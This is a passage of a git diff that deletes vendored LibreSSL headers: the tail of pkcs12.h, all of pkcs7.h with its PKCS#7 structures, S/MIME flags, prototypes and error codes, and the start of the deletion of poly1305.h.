-#define PKCS12_F_PKCS12_NEWPASS				 128
-#define PKCS12_F_PKCS12_PACK_P7DATA			 114
-#define PKCS12_F_PKCS12_PACK_P7ENCDATA			 115
-#define PKCS12_F_PKCS12_PARSE				 118
-#define PKCS12_F_PKCS12_PBE_CRYPT			 119
-#define PKCS12_F_PKCS12_PBE_KEYIVGEN			 120
-#define PKCS12_F_PKCS12_SETUP_MAC			 122
-#define PKCS12_F_PKCS12_SET_MAC				 123
-#define PKCS12_F_PKCS12_UNPACK_AUTHSAFES		 130
-#define PKCS12_F_PKCS12_UNPACK_P7DATA			 131
-#define PKCS12_F_PKCS12_VERIFY_MAC			 126
-#define PKCS12_F_PKCS8_ADD_KEYUSAGE			 124
-#define PKCS12_F_PKCS8_ENCRYPT				 125
-
-/* Reason codes. */
-#define PKCS12_R_CANT_PACK_STRUCTURE			 100
-#define PKCS12_R_CONTENT_TYPE_NOT_DATA			 121
-#define PKCS12_R_DECODE_ERROR				 101
-#define PKCS12_R_ENCODE_ERROR				 102
-#define PKCS12_R_ENCRYPT_ERROR				 103
-#define PKCS12_R_ERROR_SETTING_ENCRYPTED_DATA_TYPE	 120
-#define PKCS12_R_INVALID_NULL_ARGUMENT			 104
-#define PKCS12_R_INVALID_NULL_PKCS12_POINTER		 105
-#define PKCS12_R_IV_GEN_ERROR				 106
-#define PKCS12_R_KEY_GEN_ERROR				 107
-#define PKCS12_R_MAC_ABSENT				 108
-#define PKCS12_R_MAC_GENERATION_ERROR			 109
-#define PKCS12_R_MAC_SETUP_ERROR			 110
-#define PKCS12_R_MAC_STRING_SET_ERROR			 111
-#define PKCS12_R_MAC_VERIFY_ERROR			 112
-#define PKCS12_R_MAC_VERIFY_FAILURE			 113
-#define PKCS12_R_PARSE_ERROR				 114
-#define PKCS12_R_PKCS12_ALGOR_CIPHERINIT_ERROR		 115
-#define PKCS12_R_PKCS12_CIPHERFINAL_ERROR		 116
-#define PKCS12_R_PKCS12_PBE_CRYPT_ERROR			 117
-#define PKCS12_R_UNKNOWN_DIGEST_ALGORITHM		 118
-#define PKCS12_R_UNSUPPORTED_PKCS12_MODE		 119
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/pkcs7.h b/thirdparty/libressl/include/openssl/pkcs7.h
deleted file mode 100644
index cff7c96..0000000
--- a/thirdparty/libressl/include/openssl/pkcs7.h
+++ /dev/null
@@ -1,529 +0,0 @@
-/* $OpenBSD: pkcs7.h,v 1.18 2016/12/27 16:12:47 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_PKCS7_H
-#define HEADER_PKCS7_H
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/asn1.h>
-#include <openssl/bio.h>
-#include <openssl/ossl_typ.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#if defined(_WIN32) && defined(__WINCRYPT_H__)
-#ifndef LIBRESSL_INTERNAL
-#ifdef _MSC_VER
-#pragma message("Warning, overriding WinCrypt defines")
-#else
-#warning overriding WinCrypt defines
-#endif
-#endif
-#undef PKCS7_ISSUER_AND_SERIAL
-#undef PKCS7_SIGNER_INFO
-#endif
-
-/*
-Encryption_ID		DES-CBC
-Digest_ID		MD5
-Digest_Encryption_ID	rsaEncryption
-Key_Encryption_ID	rsaEncryption
-*/
-
-typedef struct pkcs7_issuer_and_serial_st {
-	X509_NAME *issuer;
-	ASN1_INTEGER *serial;
-} PKCS7_ISSUER_AND_SERIAL;
-
-typedef struct pkcs7_signer_info_st {
-	ASN1_INTEGER 			*version;	/* version 1 */
-	PKCS7_ISSUER_AND_SERIAL		*issuer_and_serial;
-	X509_ALGOR			*digest_alg;
-	STACK_OF(X509_ATTRIBUTE)	*auth_attr;	/* [ 0 ] */
-	X509_ALGOR			*digest_enc_alg;
-	ASN1_OCTET_STRING		*enc_digest;
-	STACK_OF(X509_ATTRIBUTE)	*unauth_attr;	/* [ 1 ] */
-
-	/* The private key to sign with */
-	EVP_PKEY			*pkey;
-} PKCS7_SIGNER_INFO;
-
-DECLARE_STACK_OF(PKCS7_SIGNER_INFO)
-
-typedef struct pkcs7_recip_info_st {
-	ASN1_INTEGER			*version;	/* version 0 */
-	PKCS7_ISSUER_AND_SERIAL		*issuer_and_serial;
-	X509_ALGOR			*key_enc_algor;
-	ASN1_OCTET_STRING		*enc_key;
-	X509				*cert; /* get the pub-key from this */
-} PKCS7_RECIP_INFO;
-
-DECLARE_STACK_OF(PKCS7_RECIP_INFO)
-
-typedef struct pkcs7_signed_st {
-	ASN1_INTEGER			*version;	/* version 1 */
-	STACK_OF(X509_ALGOR)		*md_algs;	/* md used */
-	STACK_OF(X509)			*cert;		/* [ 0 ] */
-	STACK_OF(X509_CRL)		*crl;		/* [ 1 ] */
-	STACK_OF(PKCS7_SIGNER_INFO)	*signer_info;
-
-	struct pkcs7_st			*contents;
-} PKCS7_SIGNED;
-/* The above structure is very very similar to PKCS7_SIGN_ENVELOPE.
- * How about merging the two */
-
-typedef struct pkcs7_enc_content_st {
-	ASN1_OBJECT			*content_type;
-	X509_ALGOR			*algorithm;
-	ASN1_OCTET_STRING		*enc_data;	/* [ 0 ] */
-	const EVP_CIPHER		*cipher;
-} PKCS7_ENC_CONTENT;
-
-typedef struct pkcs7_enveloped_st {
-	ASN1_INTEGER			*version;	/* version 0 */
-	STACK_OF(PKCS7_RECIP_INFO)	*recipientinfo;
-	PKCS7_ENC_CONTENT		*enc_data;
-} PKCS7_ENVELOPE;
-
-typedef struct pkcs7_signedandenveloped_st {
-	ASN1_INTEGER			*version;	/* version 1 */
-	STACK_OF(X509_ALGOR)		*md_algs;	/* md used */
-	STACK_OF(X509)			*cert;		/* [ 0 ] */
-	STACK_OF(X509_CRL)		*crl;		/* [ 1 ] */
-	STACK_OF(PKCS7_SIGNER_INFO)	*signer_info;
-
-	PKCS7_ENC_CONTENT		*enc_data;
-	STACK_OF(PKCS7_RECIP_INFO)	*recipientinfo;
-} PKCS7_SIGN_ENVELOPE;
-
-typedef struct pkcs7_digest_st {
-	ASN1_INTEGER			*version;	/* version 0 */
-	X509_ALGOR			*md;		/* md used */
-	struct pkcs7_st 		*contents;
-	ASN1_OCTET_STRING		*digest;
-} PKCS7_DIGEST;
-
-typedef struct pkcs7_encrypted_st {
-	ASN1_INTEGER			*version;	/* version 0 */
-	PKCS7_ENC_CONTENT		*enc_data;
-} PKCS7_ENCRYPT;
-
-typedef struct pkcs7_st {
-	/* The following is non NULL if it contains ASN1 encoding of
-	 * this structure */
-	unsigned char *asn1;
-	long length;
-
-#define PKCS7_S_HEADER	0
-#define PKCS7_S_BODY	1
-#define PKCS7_S_TAIL	2
-	int state; /* used during processing */
-
-	int detached;
-
-	ASN1_OBJECT *type;
-	/* content as defined by the type */
-	/* all encryption/message digests are applied to the 'contents',
-	 * leaving out the 'type' field. */
-	union	{
-		char *ptr;
-
-		/* NID_pkcs7_data */
-		ASN1_OCTET_STRING *data;
-
-		/* NID_pkcs7_signed */
-		PKCS7_SIGNED *sign;
-
-		/* NID_pkcs7_enveloped */
-		PKCS7_ENVELOPE *enveloped;
-
-		/* NID_pkcs7_signedAndEnveloped */
-		PKCS7_SIGN_ENVELOPE *signed_and_enveloped;
-
-		/* NID_pkcs7_digest */
-		PKCS7_DIGEST *digest;
-
-		/* NID_pkcs7_encrypted */
-		PKCS7_ENCRYPT *encrypted;
-
-		/* Anything else */
-		ASN1_TYPE *other;
-	} d;
-} PKCS7;
-
-DECLARE_STACK_OF(PKCS7)
-DECLARE_PKCS12_STACK_OF(PKCS7)
-
-#define PKCS7_OP_SET_DETACHED_SIGNATURE	1
-#define PKCS7_OP_GET_DETACHED_SIGNATURE	2
-
-#define PKCS7_get_signed_attributes(si)	((si)->auth_attr)
-#define PKCS7_get_attributes(si)	((si)->unauth_attr)
-
-#define PKCS7_type_is_signed(a) (OBJ_obj2nid((a)->type) == NID_pkcs7_signed)
-#define PKCS7_type_is_encrypted(a) (OBJ_obj2nid((a)->type) == NID_pkcs7_encrypted)
-#define PKCS7_type_is_enveloped(a) (OBJ_obj2nid((a)->type) == NID_pkcs7_enveloped)
-#define PKCS7_type_is_signedAndEnveloped(a) \
-		(OBJ_obj2nid((a)->type) == NID_pkcs7_signedAndEnveloped)
-#define PKCS7_type_is_data(a)   (OBJ_obj2nid((a)->type) == NID_pkcs7_data)
-#define PKCS7_type_is_digest(a)   (OBJ_obj2nid((a)->type) == NID_pkcs7_digest)
-#define PKCS7_type_is_encrypted(a) \
-		(OBJ_obj2nid((a)->type) == NID_pkcs7_encrypted)
-
-#define PKCS7_type_is_digest(a)   (OBJ_obj2nid((a)->type) == NID_pkcs7_digest)
-
-#define PKCS7_set_detached(p,v) \
-		PKCS7_ctrl(p,PKCS7_OP_SET_DETACHED_SIGNATURE,v,NULL)
-#define PKCS7_get_detached(p) \
-		PKCS7_ctrl(p,PKCS7_OP_GET_DETACHED_SIGNATURE,0,NULL)
-
-#define PKCS7_is_detached(p7) (PKCS7_type_is_signed(p7) && PKCS7_get_detached(p7))
-
-/* S/MIME related flags */
-
-#define PKCS7_TEXT		0x1
-#define PKCS7_NOCERTS		0x2
-#define PKCS7_NOSIGS		0x4
-#define PKCS7_NOCHAIN		0x8
-#define PKCS7_NOINTERN		0x10
-#define PKCS7_NOVERIFY		0x20
-#define PKCS7_DETACHED		0x40
-#define PKCS7_BINARY		0x80
-#define PKCS7_NOATTR		0x100
-#define	PKCS7_NOSMIMECAP	0x200
-#define PKCS7_NOOLDMIMETYPE	0x400
-#define PKCS7_CRLFEOL		0x800
-#define PKCS7_STREAM		0x1000
-#define PKCS7_NOCRL		0x2000
-#define PKCS7_PARTIAL		0x4000
-#define PKCS7_REUSE_DIGEST	0x8000
-
-/* Flags: for compatibility with older code */
-
-#define SMIME_TEXT	PKCS7_TEXT
-#define SMIME_NOCERTS	PKCS7_NOCERTS
-#define SMIME_NOSIGS	PKCS7_NOSIGS
-#define SMIME_NOCHAIN	PKCS7_NOCHAIN
-#define SMIME_NOINTERN	PKCS7_NOINTERN
-#define SMIME_NOVERIFY	PKCS7_NOVERIFY
-#define SMIME_DETACHED	PKCS7_DETACHED
-#define SMIME_BINARY	PKCS7_BINARY
-#define SMIME_NOATTR	PKCS7_NOATTR
-
-PKCS7_ISSUER_AND_SERIAL *PKCS7_ISSUER_AND_SERIAL_new(void);
-void PKCS7_ISSUER_AND_SERIAL_free(PKCS7_ISSUER_AND_SERIAL *a);
-PKCS7_ISSUER_AND_SERIAL *d2i_PKCS7_ISSUER_AND_SERIAL(PKCS7_ISSUER_AND_SERIAL **a, const unsigned char **in, long len);
-int i2d_PKCS7_ISSUER_AND_SERIAL(PKCS7_ISSUER_AND_SERIAL *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_ISSUER_AND_SERIAL_it;
-
-int PKCS7_ISSUER_AND_SERIAL_digest(PKCS7_ISSUER_AND_SERIAL *data,
-    const EVP_MD *type, unsigned char *md, unsigned int *len);
-PKCS7 *d2i_PKCS7_fp(FILE *fp, PKCS7 **p7);
-int i2d_PKCS7_fp(FILE *fp, PKCS7 *p7);
-PKCS7 *PKCS7_dup(PKCS7 *p7);
-PKCS7 *d2i_PKCS7_bio(BIO *bp, PKCS7 **p7);
-int i2d_PKCS7_bio(BIO *bp, PKCS7 *p7);
-int i2d_PKCS7_bio_stream(BIO *out, PKCS7 *p7, BIO *in, int flags);
-int PEM_write_bio_PKCS7_stream(BIO *out, PKCS7 *p7, BIO *in, int flags);
-
-PKCS7_SIGNER_INFO *PKCS7_SIGNER_INFO_new(void);
-void PKCS7_SIGNER_INFO_free(PKCS7_SIGNER_INFO *a);
-PKCS7_SIGNER_INFO *d2i_PKCS7_SIGNER_INFO(PKCS7_SIGNER_INFO **a, const unsigned char **in, long len);
-int i2d_PKCS7_SIGNER_INFO(PKCS7_SIGNER_INFO *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_SIGNER_INFO_it;
-PKCS7_RECIP_INFO *PKCS7_RECIP_INFO_new(void);
-void PKCS7_RECIP_INFO_free(PKCS7_RECIP_INFO *a);
-PKCS7_RECIP_INFO *d2i_PKCS7_RECIP_INFO(PKCS7_RECIP_INFO **a, const unsigned char **in, long len);
-int i2d_PKCS7_RECIP_INFO(PKCS7_RECIP_INFO *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_RECIP_INFO_it;
-PKCS7_SIGNED *PKCS7_SIGNED_new(void);
-void PKCS7_SIGNED_free(PKCS7_SIGNED *a);
-PKCS7_SIGNED *d2i_PKCS7_SIGNED(PKCS7_SIGNED **a, const unsigned char **in, long len);
-int i2d_PKCS7_SIGNED(PKCS7_SIGNED *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_SIGNED_it;
-PKCS7_ENC_CONTENT *PKCS7_ENC_CONTENT_new(void);
-void PKCS7_ENC_CONTENT_free(PKCS7_ENC_CONTENT *a);
-PKCS7_ENC_CONTENT *d2i_PKCS7_ENC_CONTENT(PKCS7_ENC_CONTENT **a, const unsigned char **in, long len);
-int i2d_PKCS7_ENC_CONTENT(PKCS7_ENC_CONTENT *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_ENC_CONTENT_it;
-PKCS7_ENVELOPE *PKCS7_ENVELOPE_new(void);
-void PKCS7_ENVELOPE_free(PKCS7_ENVELOPE *a);
-PKCS7_ENVELOPE *d2i_PKCS7_ENVELOPE(PKCS7_ENVELOPE **a, const unsigned char **in, long len);
-int i2d_PKCS7_ENVELOPE(PKCS7_ENVELOPE *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_ENVELOPE_it;
-PKCS7_SIGN_ENVELOPE *PKCS7_SIGN_ENVELOPE_new(void);
-void PKCS7_SIGN_ENVELOPE_free(PKCS7_SIGN_ENVELOPE *a);
-PKCS7_SIGN_ENVELOPE *d2i_PKCS7_SIGN_ENVELOPE(PKCS7_SIGN_ENVELOPE **a, const unsigned char **in, long len);
-int i2d_PKCS7_SIGN_ENVELOPE(PKCS7_SIGN_ENVELOPE *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_SIGN_ENVELOPE_it;
-PKCS7_DIGEST *PKCS7_DIGEST_new(void);
-void PKCS7_DIGEST_free(PKCS7_DIGEST *a);
-PKCS7_DIGEST *d2i_PKCS7_DIGEST(PKCS7_DIGEST **a, const unsigned char **in, long len);
-int i2d_PKCS7_DIGEST(PKCS7_DIGEST *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_DIGEST_it;
-PKCS7_ENCRYPT *PKCS7_ENCRYPT_new(void);
-void PKCS7_ENCRYPT_free(PKCS7_ENCRYPT *a);
-PKCS7_ENCRYPT *d2i_PKCS7_ENCRYPT(PKCS7_ENCRYPT **a, const unsigned char **in, long len);
-int i2d_PKCS7_ENCRYPT(PKCS7_ENCRYPT *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_ENCRYPT_it;
-PKCS7 *PKCS7_new(void);
-void PKCS7_free(PKCS7 *a);
-PKCS7 *d2i_PKCS7(PKCS7 **a, const unsigned char **in, long len);
-int i2d_PKCS7(PKCS7 *a, unsigned char **out);
-extern const ASN1_ITEM PKCS7_it;
-
-extern const ASN1_ITEM PKCS7_ATTR_SIGN_it;
-extern const ASN1_ITEM PKCS7_ATTR_VERIFY_it;
-
-int i2d_PKCS7_NDEF(PKCS7 *a, unsigned char **out);
-int PKCS7_print_ctx(BIO *out, PKCS7 *x, int indent, const ASN1_PCTX *pctx);
-
-long PKCS7_ctrl(PKCS7 *p7, int cmd, long larg, char *parg);
-
-int PKCS7_set_type(PKCS7 *p7, int type);
-int PKCS7_set0_type_other(PKCS7 *p7, int type, ASN1_TYPE *other);
-int PKCS7_set_content(PKCS7 *p7, PKCS7 *p7_data);
-int PKCS7_SIGNER_INFO_set(PKCS7_SIGNER_INFO *p7i, X509 *x509, EVP_PKEY *pkey,
-    const EVP_MD *dgst);
-int PKCS7_SIGNER_INFO_sign(PKCS7_SIGNER_INFO *si);
-int PKCS7_add_signer(PKCS7 *p7, PKCS7_SIGNER_INFO *p7i);
-int PKCS7_add_certificate(PKCS7 *p7, X509 *x509);
-int PKCS7_add_crl(PKCS7 *p7, X509_CRL *x509);
-int PKCS7_content_new(PKCS7 *p7, int nid);
-int PKCS7_dataVerify(X509_STORE *cert_store, X509_STORE_CTX *ctx,
-    BIO *bio, PKCS7 *p7, PKCS7_SIGNER_INFO *si);
-int PKCS7_signatureVerify(BIO *bio, PKCS7 *p7, PKCS7_SIGNER_INFO *si,
-    X509 *x509);
-
-BIO *PKCS7_dataInit(PKCS7 *p7, BIO *bio);
-int PKCS7_dataFinal(PKCS7 *p7, BIO *bio);
-BIO *PKCS7_dataDecode(PKCS7 *p7, EVP_PKEY *pkey, BIO *in_bio, X509 *pcert);
-
-
-PKCS7_SIGNER_INFO *PKCS7_add_signature(PKCS7 *p7, X509 *x509,
-    EVP_PKEY *pkey, const EVP_MD *dgst);
-X509 *PKCS7_cert_from_signer_info(PKCS7 *p7, PKCS7_SIGNER_INFO *si);
-int PKCS7_set_digest(PKCS7 *p7, const EVP_MD *md);
-STACK_OF(PKCS7_SIGNER_INFO) *PKCS7_get_signer_info(PKCS7 *p7);
-
-PKCS7_RECIP_INFO *PKCS7_add_recipient(PKCS7 *p7, X509 *x509);
-void PKCS7_SIGNER_INFO_get0_algs(PKCS7_SIGNER_INFO *si, EVP_PKEY **pk,
-    X509_ALGOR **pdig, X509_ALGOR **psig);
-void PKCS7_RECIP_INFO_get0_alg(PKCS7_RECIP_INFO *ri, X509_ALGOR **penc);
-int PKCS7_add_recipient_info(PKCS7 *p7, PKCS7_RECIP_INFO *ri);
-int PKCS7_RECIP_INFO_set(PKCS7_RECIP_INFO *p7i, X509 *x509);
-int PKCS7_set_cipher(PKCS7 *p7, const EVP_CIPHER *cipher);
-int PKCS7_stream(unsigned char ***boundary, PKCS7 *p7);
-
-PKCS7_ISSUER_AND_SERIAL *PKCS7_get_issuer_and_serial(PKCS7 *p7, int idx);
-ASN1_OCTET_STRING *PKCS7_digest_from_attributes(STACK_OF(X509_ATTRIBUTE) *sk);
-int PKCS7_add_signed_attribute(PKCS7_SIGNER_INFO *p7si, int nid, int type,
-    void *data);
-int PKCS7_add_attribute (PKCS7_SIGNER_INFO *p7si, int nid, int atrtype,
-    void *value);
-ASN1_TYPE *PKCS7_get_attribute(PKCS7_SIGNER_INFO *si, int nid);
-ASN1_TYPE *PKCS7_get_signed_attribute(PKCS7_SIGNER_INFO *si, int nid);
-int PKCS7_set_signed_attributes(PKCS7_SIGNER_INFO *p7si,
-    STACK_OF(X509_ATTRIBUTE) *sk);
-int PKCS7_set_attributes(PKCS7_SIGNER_INFO *p7si, STACK_OF(X509_ATTRIBUTE) *sk);
-
-
-PKCS7 *PKCS7_sign(X509 *signcert, EVP_PKEY *pkey, STACK_OF(X509) *certs,
-    BIO *data, int flags);
-
-PKCS7_SIGNER_INFO *PKCS7_sign_add_signer(PKCS7 *p7,
-    X509 *signcert, EVP_PKEY *pkey, const EVP_MD *md,
-    int flags);
-
-int PKCS7_final(PKCS7 *p7, BIO *data, int flags);
-int PKCS7_verify(PKCS7 *p7, STACK_OF(X509) *certs, X509_STORE *store,
-    BIO *indata, BIO *out, int flags);
-STACK_OF(X509) *PKCS7_get0_signers(PKCS7 *p7, STACK_OF(X509) *certs, int flags);
-PKCS7 *PKCS7_encrypt(STACK_OF(X509) *certs, BIO *in, const EVP_CIPHER *cipher,
-    int flags);
-int PKCS7_decrypt(PKCS7 *p7, EVP_PKEY *pkey, X509 *cert, BIO *data, int flags);
-
-int PKCS7_add_attrib_smimecap(PKCS7_SIGNER_INFO *si,
-    STACK_OF(X509_ALGOR) *cap);
-STACK_OF(X509_ALGOR) *PKCS7_get_smimecap(PKCS7_SIGNER_INFO *si);
-int PKCS7_simple_smimecap(STACK_OF(X509_ALGOR) *sk, int nid, int arg);
-
-int PKCS7_add_attrib_content_type(PKCS7_SIGNER_INFO *si, ASN1_OBJECT *coid);
-int PKCS7_add0_attrib_signing_time(PKCS7_SIGNER_INFO *si, ASN1_TIME *t);
-int PKCS7_add1_attrib_digest(PKCS7_SIGNER_INFO *si,
-    const unsigned char *md, int mdlen);
-
-int SMIME_write_PKCS7(BIO *bio, PKCS7 *p7, BIO *data, int flags);
-PKCS7 *SMIME_read_PKCS7(BIO *bio, BIO **bcont);
-
-BIO *BIO_new_PKCS7(BIO *out, PKCS7 *p7);
-
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_PKCS7_strings(void);
-
-/* Error codes for the PKCS7 functions. */
-
-/* Function codes. */
-#define PKCS7_F_B64_READ_PKCS7				 120
-#define PKCS7_F_B64_WRITE_PKCS7				 121
-#define PKCS7_F_DO_PKCS7_SIGNED_ATTRIB			 136
-#define PKCS7_F_I2D_PKCS7_BIO_STREAM			 140
-#define PKCS7_F_PKCS7_ADD0_ATTRIB_SIGNING_TIME		 135
-#define PKCS7_F_PKCS7_ADD_ATTRIB_SMIMECAP		 118
-#define PKCS7_F_PKCS7_ADD_CERTIFICATE			 100
-#define PKCS7_F_PKCS7_ADD_CRL				 101
-#define PKCS7_F_PKCS7_ADD_RECIPIENT_INFO		 102
-#define PKCS7_F_PKCS7_ADD_SIGNATURE			 131
-#define PKCS7_F_PKCS7_ADD_SIGNER			 103
-#define PKCS7_F_PKCS7_BIO_ADD_DIGEST			 125
-#define PKCS7_F_PKCS7_COPY_EXISTING_DIGEST		 138
-#define PKCS7_F_PKCS7_CTRL				 104
-#define PKCS7_F_PKCS7_DATADECODE			 112
-#define PKCS7_F_PKCS7_DATAFINAL				 128
-#define PKCS7_F_PKCS7_DATAINIT				 105
-#define PKCS7_F_PKCS7_DATASIGN				 106
-#define PKCS7_F_PKCS7_DATAVERIFY			 107
-#define PKCS7_F_PKCS7_DECRYPT				 114
-#define PKCS7_F_PKCS7_DECRYPT_RINFO			 133
-#define PKCS7_F_PKCS7_ENCODE_RINFO			 132
-#define PKCS7_F_PKCS7_ENCRYPT				 115
-#define PKCS7_F_PKCS7_FINAL				 134
-#define PKCS7_F_PKCS7_FIND_DIGEST			 127
-#define PKCS7_F_PKCS7_GET0_SIGNERS			 124
-#define PKCS7_F_PKCS7_RECIP_INFO_SET			 130
-#define PKCS7_F_PKCS7_SET_CIPHER			 108
-#define PKCS7_F_PKCS7_SET_CONTENT			 109
-#define PKCS7_F_PKCS7_SET_DIGEST			 126
-#define PKCS7_F_PKCS7_SET_TYPE				 110
-#define PKCS7_F_PKCS7_SIGN				 116
-#define PKCS7_F_PKCS7_SIGNATUREVERIFY			 113
-#define PKCS7_F_PKCS7_SIGNER_INFO_SET			 129
-#define PKCS7_F_PKCS7_SIGNER_INFO_SIGN			 139
-#define PKCS7_F_PKCS7_SIGN_ADD_SIGNER			 137
-#define PKCS7_F_PKCS7_SIMPLE_SMIMECAP			 119
-#define PKCS7_F_PKCS7_VERIFY				 117
-#define PKCS7_F_SMIME_READ_PKCS7			 122
-#define PKCS7_F_SMIME_TEXT				 123
-
-/* Reason codes. */
-#define PKCS7_R_CERTIFICATE_VERIFY_ERROR		 117
-#define PKCS7_R_CIPHER_HAS_NO_OBJECT_IDENTIFIER		 144
-#define PKCS7_R_CIPHER_NOT_INITIALIZED			 116
-#define PKCS7_R_CONTENT_AND_DATA_PRESENT		 118
-#define PKCS7_R_CTRL_ERROR				 152
-#define PKCS7_R_DECODE_ERROR				 130
-#define PKCS7_R_DECRYPTED_KEY_IS_WRONG_LENGTH		 100
-#define PKCS7_R_DECRYPT_ERROR				 119
-#define PKCS7_R_DIGEST_FAILURE				 101
-#define PKCS7_R_ENCRYPTION_CTRL_FAILURE			 149
-#define PKCS7_R_ENCRYPTION_NOT_SUPPORTED_FOR_THIS_KEY_TYPE 150
-#define PKCS7_R_ERROR_ADDING_RECIPIENT			 120
-#define PKCS7_R_ERROR_SETTING_CIPHER			 121
-#define PKCS7_R_INVALID_MIME_TYPE			 131
-#define PKCS7_R_INVALID_NULL_POINTER			 143
-#define PKCS7_R_MIME_NO_CONTENT_TYPE			 132
-#define PKCS7_R_MIME_PARSE_ERROR			 133
-#define PKCS7_R_MIME_SIG_PARSE_ERROR			 134
-#define PKCS7_R_MISSING_CERIPEND_INFO			 103
-#define PKCS7_R_NO_CONTENT				 122
-#define PKCS7_R_NO_CONTENT_TYPE				 135
-#define PKCS7_R_NO_DEFAULT_DIGEST			 151
-#define PKCS7_R_NO_MATCHING_DIGEST_TYPE_FOUND		 154
-#define PKCS7_R_NO_MULTIPART_BODY_FAILURE		 136
-#define PKCS7_R_NO_MULTIPART_BOUNDARY			 137
-#define PKCS7_R_NO_RECIPIENT_MATCHES_CERTIFICATE	 115
-#define PKCS7_R_NO_RECIPIENT_MATCHES_KEY		 146
-#define PKCS7_R_NO_SIGNATURES_ON_DATA			 123
-#define PKCS7_R_NO_SIGNERS				 142
-#define PKCS7_R_NO_SIG_CONTENT_TYPE			 138
-#define PKCS7_R_OPERATION_NOT_SUPPORTED_ON_THIS_TYPE	 104
-#define PKCS7_R_PKCS7_ADD_SIGNATURE_ERROR		 124
-#define PKCS7_R_PKCS7_ADD_SIGNER_ERROR			 153
-#define PKCS7_R_PKCS7_DATAFINAL				 126
-#define PKCS7_R_PKCS7_DATAFINAL_ERROR			 125
-#define PKCS7_R_PKCS7_DATASIGN				 145
-#define PKCS7_R_PKCS7_PARSE_ERROR			 139
-#define PKCS7_R_PKCS7_SIG_PARSE_ERROR			 140
-#define PKCS7_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE	 127
-#define PKCS7_R_SIGNATURE_FAILURE			 105
-#define PKCS7_R_SIGNER_CERTIFICATE_NOT_FOUND		 128
-#define PKCS7_R_SIGNING_CTRL_FAILURE			 147
-#define PKCS7_R_SIGNING_NOT_SUPPORTED_FOR_THIS_KEY_TYPE	 148
-#define PKCS7_R_SIG_INVALID_MIME_TYPE			 141
-#define PKCS7_R_SMIME_TEXT_ERROR			 129
-#define PKCS7_R_UNABLE_TO_FIND_CERTIFICATE		 106
-#define PKCS7_R_UNABLE_TO_FIND_MEM_BIO			 107
-#define PKCS7_R_UNABLE_TO_FIND_MESSAGE_DIGEST		 108
-#define PKCS7_R_UNKNOWN_DIGEST_TYPE			 109
-#define PKCS7_R_UNKNOWN_OPERATION			 110
-#define PKCS7_R_UNSUPPORTED_CIPHER_TYPE			 111
-#define PKCS7_R_UNSUPPORTED_CONTENT_TYPE		 112
-#define PKCS7_R_WRONG_CONTENT_TYPE			 113
-#define PKCS7_R_WRONG_PKCS7_TYPE			 114
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/poly1305.h b/thirdparty/libressl/include/openssl/poly1305.h
deleted file mode 100644
index 00ab0bf..0000000
--- a/thirdparty/libressl/include/openssl/poly1305.h
+++ /dev/null
@@ -1,49 +0,0 @@
